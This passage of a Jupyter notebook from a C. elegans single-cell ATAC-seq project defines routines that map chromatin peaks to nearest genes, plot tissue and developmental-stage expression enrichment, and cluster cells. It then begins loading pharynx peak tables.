[ [ "code", "code", "code", "code", "code" ] ]
e7314b23d99e30cda10163bae8f08d2d07157258
344,850
ipynb
Jupyter Notebook
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
1
2021-04-23T01:45:29.000Z
2021-04-23T01:45:29.000Z
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
null
null
null
notebooks/pharynx_analysis.primary_lda.ipynb
tdurham86/L2_sci-ATAC-seq
6d6e3be43d26ef2534b538021edf02cc2e59ea83
[ "MIT" ]
null
null
null
165.713599
244,620
0.837033
[ [ [ "%matplotlib notebook\n\nfrom collections import Counter\nimport dill\nimport glob\nimport igraph as ig\nimport itertools\nimport leidenalg\n#import magic\nimport matplotlib\nfrom matplotlib import pyplot\nimport numba\nimport numpy\nimport os\nimport pickle\nfrom plumbum import local\nimport random\nimport re\nimport scipy\nfrom scipy.cluster import hierarchy\nimport scipy.sparse as sps\nfrom scipy.spatial import distance\nimport scipy.stats as stats\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn import neighbors\nfrom sklearn import metrics\nimport sys\nimport umap\n\n#from plotly import tools\n#import plotly.offline as py\n#import plotly.graph_objs as go\n#py.init_notebook_mode(connected=True)", "src/anaconda/envs/python3_remake2/lib/python3.6/site-packages/sklearn/externals/joblib/__init__.py:15: FutureWarning: sklearn.externals.joblib is deprecated in 0.21 and will be removed in 0.23. Please import this functionality directly from joblib, which can be installed with: pip install joblib. If this warning is raised when loading pickled models, you may need to re-serialize those models with scikit-learn 0.21+.\n warnings.warn(msg, category=FutureWarning)\n" ], [ "def find_nearest_genes(peak_files, out_subdir, refseq_exon_bed):\n #get unix utilities\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n\n #process the peak files to find nearest genes\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n return nearest_genes\n\ndef load_expr_db(db_path):\n if os.path.basename(db_path) == 'RepAvgGeneTPM.csv':\n with open(db_path) as lines_in:\n db_headers = lines_in.readline().strip().split(',')[1:]\n db_vals = numpy.loadtxt(db_path, delimiter=',', skiprows=1, dtype=object)[:,1:]\n else:\n with open(db_path) as lines_in:\n db_headers = lines_in.readline().strip().split('\\t')\n db_vals = numpy.loadtxt(db_path, delimiter='\\t', skiprows=1, dtype=object)\n print('Loaded DB shape: {!s}'.format(db_vals.shape))\n return (db_headers, db_vals)\n\nTOPN=500\ndef get_gene_data(genes_path, gene_expr_db, topn=TOPN):\n if isinstance(genes_path, list):\n genes_list = genes_path\n else:\n with open(genes_path) as lines_in:\n genes_list = [elt.strip().split()[:2] for elt in lines_in]\n gene_idx = [(numpy.where(gene_expr_db[:,0] == elt[0])[0],elt[1]) for elt in genes_list]\n gene_idx_sorted = sorted(gene_idx, key=lambda x:float(x[1]), reverse=True)\n gene_idx, gene_weights = zip(*[elt for elt in gene_idx_sorted if len(elt[0]) > 0][:topn])\n gene_idx = [elt[0] for elt in gene_idx]\n gene_data = gene_expr_db[:,1:].astype(float)[gene_idx,:]\n denom = numpy.sum(gene_data, axis=1)[:,None] + 1e-8\n gene_norm = gene_data/denom\n return gene_idx, gene_data, gene_norm, len(genes_list), numpy.array(gene_weights, dtype=float)\n\ndef sample_db(data_norm, expr_db, data_weights=None, nsamples=1000):\n samples = []\n rs = numpy.random.RandomState(15321)\n random_subset = numpy.arange(expr_db.shape[0])\n num_to_select = data_norm.shape[0]\n for idx in range(nsamples):\n rs.shuffle(random_subset)\n db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n denom = numpy.sum(db_subset, axis=1)[:None] + 1e-8\n db_subset_norm = numpy.mean((db_subset.T/denom).T, axis=0)\n if data_weights is not None:\n samples.append(numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/db_subset_norm))\n else:\n samples.append(numpy.log2(numpy.average(data_norm, axis=0, weights=None)/db_subset_norm))\n samples = numpy.vstack(samples)\n samples_mean = numpy.mean(samples, axis=0)\n samples_sem = stats.sem(samples, axis=0)\n conf_int = numpy.array([stats.t.interval(0.95, samples.shape[0]-1, \n loc=samples_mean[idx], scale=samples_sem[idx])\n for idx in range(samples.shape[1])]).T\n conf_int[0] = samples_mean - conf_int[0]\n conf_int[1] = conf_int[1] - samples_mean\n return samples_mean, conf_int\n\ndef plot_l2_tissues(nearest_genes_glob, refdata, expr_db=None, expr_db_headers=None, ncols=3, \n topn=TOPN, weights=False, nsamples=100, savefile=None, display_in_notebook=True):\n if expr_db is None:\n #Get all L2 tissue expression data to normalize the distribution of genes from peaks\n l2_tissue_db_path = os.path.join(refdata,'gexplore_l2_tissue_expr.txt')\n expr_db_headers, expr_db = load_expr_db(l2_tissue_db_path)\n \n gene_lists = glob.glob(nearest_genes_glob)\n if os.path.basename(gene_lists[0]).startswith('peaks'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[0].replace('peaks', '')))\n elif os.path.basename(gene_lists[0]).startswith('topic'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[1].replace('rank', '')))\n else:\n gene_lists.sort(key=lambda x:os.path.basename(x).split('.')[0])\n gene_list_data = [(os.path.basename(path).split('.')[0], get_gene_data(path, expr_db, topn=topn)) for path in gene_lists]\n print('\\n'.join(['{!s} nearest genes: found {!s} out of {!s} total'.format(fname, data.shape[0], gene_list_len)\n for (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in gene_list_data]))\n \n l2_tissue_colors = [('Body wall muscle', '#e51a1e'),\n ('Intestinal/rectal muscle', '#e51a1e'),\n ('Pharyngeal muscle', '#377db8'),\n ('Pharyngeal epithelia', '#377db8'),\n ('Pharyngeal gland', '#377db8'),\n ('Seam cells', '#4eae4a'),\n ('Non-seam hypodermis', '#4eae4a'),\n ('Rectum', '#4eae4a'),\n ('Ciliated sensory neurons', '#984ea3'),\n ('Oxygen sensory neurons', '#984ea3'),\n ('Touch receptor neurons', '#984ea3'),\n ('Cholinergic neurons', '#984ea3'),\n ('GABAergic neurons', '#984ea3'),\n ('Pharyngeal neurons', '#984ea3'),\n ('flp-1(+) interneurons', '#984ea3'),\n ('Other interneurons', '#984ea3'),\n ('Canal associated neurons', '#984ea3'),\n ('Am/PH sheath cells', '#ff8000'),\n ('Socket cells', '#ff8000'),\n ('Excretory cells', '#ff8000'),\n ('Intestine', '#fcd800'),\n ('Germline', '#f97fc0'),\n ('Somatic gonad precursors', '#f97fc0'),\n ('Distal tip cells', '#f97fc0'),\n ('Vulval precursors', '#f97fc0'),\n ('Sex myoblasts', '#f97fc0'),\n ('Coelomocytes', '#a75629')]\n idx_by_color = {}\n for idx, (name, color) in enumerate(l2_tissue_colors):\n try:\n idx_by_color[color][1].append(idx)\n except KeyError:\n idx_by_color[color] = [name, [idx]]\n \n# rs = numpy.random.RandomState(15321)\n# random_subset = numpy.arange(expr_db.shape[0])\n# rs.shuffle(random_subset)\n# #num_to_select = int(numpy.mean([neuron_data.shape[0], emb_muscle_data.shape[0], l2_muscle_data.shape[0]]))\n# num_to_select = len(random_subset)\n# l2_tissue_db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n# denom = numpy.sum(l2_tissue_db_subset, axis=1)[:,None] + 1e-8\n# l2_tissue_db_norm = numpy.mean(l2_tissue_db_subset/denom, axis=0)\n print('Tissue DB norm shape: {!s}'.format(expr_db.shape))\n\n pyplot.rcParams.update({'xtick.labelsize':14,\n 'ytick.labelsize':14,\n 'xtick.major.pad':8})\n\n ind = numpy.arange(len(expr_db_headers) - 1)\n width = 0.66\n axis_fontsize = 18\n title_fontsize = 19\n nrows = int(numpy.ceil(len(gene_list_data)/float(ncols)))\n fig, axes = pyplot.subplots(nrows=nrows, ncols=ncols, figsize=(7 * ncols, 7 * nrows), sharey=True)\n for idx, (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in enumerate(gene_list_data):\n ax_idx = (idx//ncols, idx%ncols) if nrows > 1 else idx\n# to_plot = numpy.log2(numpy.mean(data_norm, axis=0)/l2_tissue_db_norm)\n# import pdb; pdb.set_trace()\n if weights is True:\n# to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/l2_tissue_db_norm)\n to_plot, errs = sample_db(data_norm, expr_db, data_weights=gene_weights, nsamples=nsamples)\n else:\n# to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=None)/l2_tissue_db_norm)\n to_plot, errs = sample_db(data_norm, expr_db, data_weights=None, nsamples=nsamples)\n for idx, (name, color) in enumerate(l2_tissue_colors):\n axes[ax_idx[0],ax_idx[1]].bar(ind[idx], to_plot[idx], width, yerr=errs[:,idx][:,None], color=color, label=name)\n axes[ax_idx[0],ax_idx[1]].axhline(0, color='k')\n axes[ax_idx[0],ax_idx[1]].set_xlim((-1, len(expr_db_headers)))\n axes[ax_idx[0],ax_idx[1]].set_title('{!s}\\n({!s} genes)\\n'.format(fname, data.shape[0]), fontsize=title_fontsize)\n axes[ax_idx[0],ax_idx[1]].set_ylabel('Log2 ratio of mean expr proportion\\n(ATAC targets:Random genes)', fontsize=axis_fontsize)\n axes[ax_idx[0],ax_idx[1]].set_xlabel('L2 tissues', fontsize=axis_fontsize)\n axes[ax_idx[0],ax_idx[1]].set_xticks(ind + width/2)\n axes[ax_idx[0],ax_idx[1]].set_xticklabels([])\n #axes[0].set_xticklabels(expr_db_headers[1:], rotation=90)\n if nrows > 1:\n axes[0,ncols-1].legend(bbox_to_anchor=[1.0,1.0])\n else:\n axes[-1].legend(bbox_to_anchor=[1.0,1.0])\n\n if display_in_notebook is True:\n fig.tight_layout()\n if savefile is not None:\n fig.savefig(savefile, bbox_inches='tight')\n\ndef plot_stages(nearest_genes_glob, refdata, expr_db=None, expr_db_headers=None, ncols=3, topn=TOPN, weights=False):\n if expr_db is None:\n #Get all stages expression data to normalize the distribution of genes from peaks\n stage_db_path = os.path.join(refdata,'gexplore_stage_expr.txt')\n expr_db_headers, expr_db = load_expr_db(stage_db_path)\n\n gene_lists = glob.glob(nearest_genes_glob)\n if os.path.basename(gene_lists[0]).startswith('peaks'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[0].replace('peaks', '')))\n elif os.path.basename(gene_lists[0]).startswith('topic'):\n gene_lists.sort(key=lambda x:int(os.path.basename(x).split('.')[1].replace('rank', '')))\n else:\n gene_lists.sort(key=lambda x:os.path.basename(x).split('.')[0])\n gene_list_data = [(os.path.basename(path).split('.')[0], get_gene_data(path, expr_db, topn=topn)) for path in gene_lists]\n print('\\n'.join(['{!s} nearest genes: found {!s} out of {!s} total'.format(fname, data.shape[0], gene_list_len)\n for (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in gene_list_data]))\n \n rs = numpy.random.RandomState(15321)\n random_subset = numpy.arange(expr_db.shape[0])\n rs.shuffle(random_subset)\n #num_to_select = int(numpy.mean([neuron_data.shape[0], emb_muscle_data.shape[0], l2_muscle_data.shape[0]]))\n num_to_select = len(random_subset)\n stage_db_subset = expr_db[random_subset[:num_to_select]][:,1:].astype(float)\n denom = numpy.sum(stage_db_subset, axis=1)[:,None] + 1e-8\n stage_db_norm = numpy.mean(stage_db_subset/denom, axis=0)\n print('Stage DB norm shape: {!s}'.format(stage_db_norm.shape))\n\n emb_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n if elt.endswith('m') or elt == '4-cell']\n larva_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n if elt.startswith('L')]\n adult_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:]\n if 'adult' in elt]\n dauer_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:]\n if 'dauer' in elt]\n# rest_idx = [expr_db_headers[1:].index(elt) for elt in expr_db_headers[1:] \n# if not elt.endswith('m') and not elt.startswith('L') and elt != '4-cell']\n\n pyplot.rcParams.update({'xtick.labelsize':20,\n 'ytick.labelsize':20,\n 'xtick.major.pad':8})\n\n ind = numpy.arange(len(expr_db_headers) - 1)\n width = 0.66\n axis_fontsize = 25\n title_fontsize = 27\n nrows = int(numpy.ceil(len(gene_list_data)/float(ncols)))\n fig, axes = pyplot.subplots(nrows=nrows, ncols=ncols, figsize=(7 * ncols, 7 * nrows), sharey=True)\n for idx, (fname, (data_idx, data, data_norm, gene_list_len, gene_weights)) in enumerate(gene_list_data):\n ax_idx = (idx//ncols, idx%ncols) if nrows > 1 else idx\n# to_plot = numpy.log2(numpy.mean(data_norm, axis=0)/stage_db_norm)\n if weights is True:\n to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=gene_weights)/stage_db_norm)\n else:\n to_plot = numpy.log2(numpy.average(data_norm, axis=0, weights=None)/stage_db_norm)\n axes[ax_idx].bar(ind[emb_idx], to_plot[emb_idx], width, color='orange', label='Embryo')\n axes[ax_idx].bar(ind[larva_idx], to_plot[larva_idx], width, color='blue', label='Larva')\n axes[ax_idx].bar(ind[adult_idx], to_plot[adult_idx], width, color='red', label='Adult')\n axes[ax_idx].bar(ind[dauer_idx], to_plot[dauer_idx], width, color='green', label='Dauer')\n# axes[ax_idx].bar(ind[rest_idx], to_plot[rest_idx], width, color='grey', label='Other')\n axes[ax_idx].axhline(0, color='k')\n axes[ax_idx].set_xlim((-1, len(expr_db_headers)))\n axes[ax_idx].set_title('{!s}\\n({!s} genes)\\n'.format(fname, data.shape[0]), fontsize=title_fontsize)\n axes[ax_idx].set_ylabel('Log2 Ratio of Mean Expr Proportion\\n(ATAC Targets:All Genes)', fontsize=axis_fontsize)\n axes[ax_idx].set_xlabel('Developmental Stage', fontsize=axis_fontsize)\n axes[ax_idx].set_xticks(ind + width/2)\n axes[ax_idx].set_xticklabels([])\n\n fig.tight_layout()\n\ndef leiden_clustering(umap_res, resolution_range=(0,1), random_state=2, kdtree_dist='euclidean'):\n tree = neighbors.KDTree(umap_res, metric=kdtree_dist)\n vals, i, j = [], [], []\n for idx in range(umap_res.shape[0]):\n dist, ind = tree.query([umap_res[idx]], k=25)\n vals.extend(list(dist.squeeze()))\n j.extend(list(ind.squeeze()))\n i.extend([idx] * len(ind.squeeze()))\n print(len(vals))\n ginput = sps.csc_matrix((numpy.array(vals), (numpy.array(i),numpy.array(j))), \n shape=(umap_res.shape[0], umap_res.shape[0]))\n sources, targets = ginput.nonzero()\n edgelist = zip(sources.tolist(), targets.tolist())\n G = ig.Graph(edges=list(edgelist))\n optimiser = leidenalg.Optimiser()\n optimiser.set_rng_seed(random_state)\n profile = optimiser.resolution_profile(G, leidenalg.CPMVertexPartition, resolution_range=resolution_range, number_iterations=0)\n print([len(elt) for elt in profile])\n return profile\n\ndef write_peaks_and_map_to_genes(data_array, row_headers, c_labels, out_dir, refseq_exon_bed, \n uniqueness_threshold=3, num_peaks=1000):\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n \n #write a file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n cell_coords = numpy.where(c_labels == cluster_name)\n peak_sums = numpy.mean(data_array[:,cell_coords[0]], axis=1)\n peak_sort = numpy.argsort(peak_sums)\n# sorted_peaks = peak_sums[peak_sort]\n# print('Cluster {!s} -- Present Peaks: {!s}, '\n# 'Min Peaks/Cell: {!s}, '\n# 'Max Peaks/Cell: {!s}, '\n# 'Peaks in {!s}th cell: {!s}'.format(cluster_name, numpy.sum(peak_sums > 0), \n# sorted_peaks[0], sorted_peaks[-1], \n# num_peaks, sorted_peaks[-num_peaks]))\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n peak_indices = peak_sort[-num_peaks:]\n with open(out_tmp, 'w') as out:\n out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n for elt in numpy.hstack([row_headers[peak_indices],\n peak_sums[peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return\n\ndef write_peaks_and_map_to_genes2(data_array, peak_topic_specificity, row_headers, c_labels, out_dir, \n refseq_exon_bed, uniqueness_threshold=3, num_peaks=1000):\n# import pdb; pdb.set_trace()\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n \n #write a file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n cell_coords = numpy.where(c_labels == cluster_name)\n peaks_present = numpy.sum(data_array[cell_coords[0],:], axis=0)\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n# peak_indices = peak_sort[-num_peaks:]\n peak_scores = (peak_topic_specificity ** 2) * peaks_present\n sort_idx = numpy.argsort(peak_scores[peaks_present.astype(bool)])\n peak_indices = sort_idx[-num_peaks:]\n with open(out_tmp, 'w') as out:\n# out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n# for elt in numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n# peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n out.write('\\n'.join('\\t'.join(elt) for elt in \n numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return\n\ndef write_peaks_and_map_to_genes3(data_array, row_headers, c_labels, out_dir, \n refseq_exon_bed, uniqueness_threshold=3, num_peaks=1000):\n# import pdb; pdb.set_trace()\n #write the peaks present in each cluster to bed files\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n else:\n local['rm']('-r', out_dir)\n os.makedirs(out_dir)\n\n agg_clusters = numpy.vstack([numpy.sum(data_array[numpy.where(c_labels == cluster_idx)[0]], axis=0)\n for cluster_idx in sorted(set(c_labels))])\n tfidf = TfidfTransformer(norm='l2', use_idf=True, smooth_idf=True, sublinear_tf=False)\n agg_clusters_tfidf = tfidf.fit_transform(agg_clusters).toarray()\n\n #write a file of peaks per cluster in bed format\n peak_files = []\n for idx, cluster_name in enumerate(sorted(set(c_labels))):\n out_tmp = os.path.join(out_dir, 'peaks{!s}.tmp.bed'.format(cluster_name))\n out_path = out_tmp.replace('.tmp', '')\n sort_idx = numpy.argsort(agg_clusters_tfidf[idx])\n peak_indices = sort_idx[-num_peaks:]\n with open(out_tmp, 'w') as out:\n# out.write('\\n'.join('chr'+'\\t'.join(elt) if not elt[0].startswith('chr') else '\\t'.join(elt) \n# for elt in numpy.hstack([row_headers[peaks_present.astype(bool)][peak_indices],\n# peak_scores[peaks_present.astype(bool)][peak_indices,None].astype(str)])) + '\\n')\n out.write('\\n'.join('\\t'.join(elt) for elt in \n numpy.hstack([row_headers[peak_indices],\n agg_clusters_tfidf[idx][peak_indices,None].astype(str)])) + '\\n')\n (local['sort']['-k1,1', '-k2,2n', out_tmp] > out_path)()\n os.remove(out_tmp)\n peak_files.append(out_path)\n\n bedtools, sort, cut, uniq, awk = local['bedtools'], local['sort'], local['cut'], local['uniq'], local['awk']\n out_subdir = os.path.join(out_dir, 'nearest_genes')\n if not os.path.isdir(out_subdir):\n os.makedirs(out_subdir)\n nearest_genes = []\n for path in sorted(peak_files):\n out_path = os.path.join(out_subdir, os.path.basename(path).replace('.bed', '.nearest_genes.txt'))\n cmd = (bedtools['closest', '-D', 'b', '-io', '-id', '-a', path, '-b', refseq_exon_bed] |\n cut['-f1,2,3,5,9,12'] | #fields are chrom, start, stop, peak sum, gene name, distance\n awk['BEGIN{OFS=\"\\t\"}{if($6 > -1200){print($1, $2, $3, $6, $5, $4);}}'] |\n sort['-k5,5', '-k6,6nr'] |\n cut['-f5,6'])()\n with open(out_path, 'w') as out:\n prev_gene = None\n for idx, line in enumerate(str(cmd).strip().split('\\n')):\n if prev_gene is None or not line.startswith(prev_gene):\n# print(line)\n line_split = line.strip().split()\n prev_gene = line_split[0]\n out.write(line + '\\n')\n nearest_genes.append(out_path)\n\n all_genes = []\n# for idx in range(len(nearest_genes)):\n# nearest_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes.txt'.format(idx))\n for nearest_genes_path in nearest_genes:\n with open(nearest_genes_path) as lines_in:\n all_genes.append([elt.strip().split() for elt in lines_in.readlines()])\n\n# count_dict = Counter([i[0] for i in itertools.chain(*[all_genes[elt] for elt in range(len(nearest_genes))])])\n count_dict = Counter([i[0] for i in itertools.chain(*all_genes)])\n #print unique genes\n for idx, nearest_genes_path in enumerate(nearest_genes):\n unique_genes = [elt for elt in all_genes[idx] if count_dict[elt[0]] < uniqueness_threshold]\n print(idx, len(unique_genes))\n# unique_genes_path = os.path.join(out_subdir, 'peaks{!s}.nearest_genes_lt_{!s}.txt'.\n# format(idx, uniqueness_threshold))\n unique_genes_path = os.path.splitext(nearest_genes_path)[0] + '_lt_{!s}.txt'.format(uniqueness_threshold)\n with open(unique_genes_path, 'w') as out:\n out.write('\\n'.join(['\\t'.join(elt) for elt in unique_genes]) + '\\n')\n #print shared genes\n shared_genes_by_cluster = []\n all_genes = [dict([(k,float(v)) for k,v in elt]) for elt in all_genes]\n for gene_name in sorted(count_dict.keys()):\n if count_dict[gene_name] < uniqueness_threshold:\n continue\n shared_genes_by_cluster.append([gene_name])\n for cluster_dict in all_genes:\n shared_genes_by_cluster[-1].append(cluster_dict.get(gene_name, 0.0))\n shared_out = os.path.join(out_subdir, 'non-unique_genes_lt_{!s}.txt'.\n format(uniqueness_threshold))\n numpy.savetxt(shared_out, shared_genes_by_cluster, fmt='%s')\n# fmt=('%s',)+tuple('%18f' for _ in range(len(all_genes))))\n\n return", "_____no_output_____" ] ], [ [ "## Peaks model", "_____no_output_____" ] ], [ [ "#read in sc peak table\npeaktable_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.bow'\npeak_data_sparse = numpy.loadtxt(peaktable_path, dtype=int, skiprows=3)\npeak_data = sps.csr_matrix((peak_data_sparse[:,2], (peak_data_sparse[:,0] - 1, peak_data_sparse[:,1] - 1)))\n\ncell_names_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.indextable.txt'\ncell_names = numpy.loadtxt(cell_names_path, dtype=object)[:,0]\n\npeak_names_path = '../tissue_analysis/pharynx/filtered_peaks_iqr4.0_low_cells.extra_cols.bed'\npeak_row_headers = numpy.loadtxt(peak_names_path, dtype=object)\n#chr_regex = re.compile('[:-]')\npeak_row_headers = numpy.hstack([peak_row_headers, numpy.array(['name'] * peak_row_headers.shape[0])[:,None]])\nprint(peak_data.shape)\n\norig_peaktable_path = '../tissue_analysis/pharynx/pharynx_all_peaks.bow'\norig_peak_data_sparse = numpy.loadtxt(orig_peaktable_path, dtype=int, skiprows=3)\norig_peak_data = sps.csr_matrix((orig_peak_data_sparse[:,2], \n (orig_peak_data_sparse[:,0] - 1, orig_peak_data_sparse[:,1] - 1)))\n\norig_cell_names_path = '../tissue_analysis/pharynx/pharynx_all_peaks.zeros_filtered.indextable.txt'\norig_cell_names = 